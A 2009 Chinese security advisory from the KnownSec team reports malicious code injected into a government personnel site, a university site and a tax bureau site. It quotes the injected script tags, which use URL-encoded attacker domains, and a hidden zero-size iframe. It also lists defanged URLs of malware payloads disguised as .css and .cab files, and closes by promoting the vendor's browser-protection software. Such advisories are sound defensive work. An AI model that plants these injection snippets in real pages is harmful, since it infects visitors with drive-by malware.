知道创宇

发布时间：Sat Mar 21 2009 19:59:14 UTC+0800
最后更新时间：Sat Mar 21 2009 19:59:14 UTC+0800
________________________________________
知道创宇安全团队（KnownSec team）于今天捕获以下网站被植入恶意代码：莱芜人事信息网、天津商业大学、石狮市地方税务局、
 

莱芜人事信息网（hxxp://lwrs.laiwu.gov.cn/）多处被植入恶意代码：
<script src=hxxp://%77%77%77%2E%34%31%39%2E%63%6F%6D%2E%63%6E/1.js></script>
<script src=hxxp://%71%77%72%31%2E%63%6E></script>
恶意链接地址解密后为：
hxxp://www.419.com.cn/1.js
hxxp://qwr1.cn
通过漏洞攻击，最终下载病毒：
hxxp://c-0p.cn:6135/qwer/ms.css
hxxp://c-0p.cn:6135/qwer/as.css
hxxp://c-0p.cn:6135/qwer/bf.css
hxxp://c-0p.cn:6135/qwer/lzz.css
hxxp://c-0p.cn:6135/qwer/re.css
hxxp://c-0p.cn:6135/qwer/real11.css
hxxp://c-0p.cn:6135/baidu.cab
hxxp://c-0p.cn:6135/qwer/adr.css
 

天津商业大学（hxxp://bkzs.njnu.edu.cn/1.js）多处被植入恶意代码：
document.write(”<iframe src=hxxp://12wds.cn:6135/a0076159/a07.htm width=0 height=0></iframe>”)
通过漏洞攻击，最终下载病毒：
hxxp://c-0p.cn:6135/qwer/ms.css
hxxp://c-0p.cn:6135/qwer/as.css
hxxp://c-0p.cn:6135/qwer/bf.css
hxxp://c-0p.cn:6135/qwer/lzz.css
hxxp://c-0p.cn:6135/qwer/re.css
hxxp://c-0p.cn:6135/qwer/real11.css
hxxp://c-0p.cn:6135/baidu.cab
hxxp://c-0p.cn:6135/qwer/adr.css
 

石狮市地方税务局（hxxp://fjqzss-l-tax.gov.cn/）多处被植入恶意代码：
<script src=hxxp://%63%63%6A%33%2E%63%6E></script><script src=hxxp://%63%63%6A%35%2E%63%6E></script><script src=hxxp://%63%63%6A%37%2E%63%6E></script><script src=hxxp://%63%63%6A%37%2E%63%6E></script><script src=hxxp://%63%63%6A%37%2E%63%6E></script><script src=hxxp://%71%77%72%31%2E%63%6E></script>
通过漏洞攻击，最终下载病毒：
hxxp://d.wixww.com/new/a1.css
hxxp://d.mxxio.com:88/new/a1.css
hxxp://d.opqxn.com/new/a2.css
 

推荐的应对方法： 安装365门神软件，对IE浏览器在打开网站的时候进行保护，拦截来自网络带有恶意代码的网页攻击。使用帮助和下载：http://365menshen.com

Popularity: 19% [?]